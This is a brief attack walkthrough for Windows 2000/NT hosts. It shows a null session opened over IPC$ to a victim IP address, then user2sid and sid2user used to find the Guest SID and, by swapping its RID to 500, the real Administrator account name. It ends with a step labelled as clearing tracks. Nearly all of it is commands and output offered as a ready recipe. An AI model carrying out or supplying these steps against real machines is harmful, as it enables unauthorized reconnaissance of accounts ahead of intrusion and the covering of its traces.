Manipulating Guest account
Victim Platform: Windows 2000/NT.
Create null session on victim:
C:\PSEUDO>net use \\ipaddress\IPC$ "" /user: ""
After "The command completed successfully.", user2sid:
C:\PSEUDO>user2sid \\10.2.18.205 Guest
S-1-5-21-602162358-152049171-839522115-501
Number of subauthorities is 5
Domain is U0401
Length of SID in memory is 28 bytes
Type of SID is SidTypeUser
Copy: 5-21-602162358-152049171-839522115-501
Replace -501 with -500 as below and use the sid2user:
C:\PSEUDO>sid2user \\10.2.18.205 5 21 602162358 152049171 839522115 500
Name is Administrator
Domain is U0401
Type of SID is SidTypeUser
Clear up the track:
C:\PSEUDO>net use \\ipaddress /delete
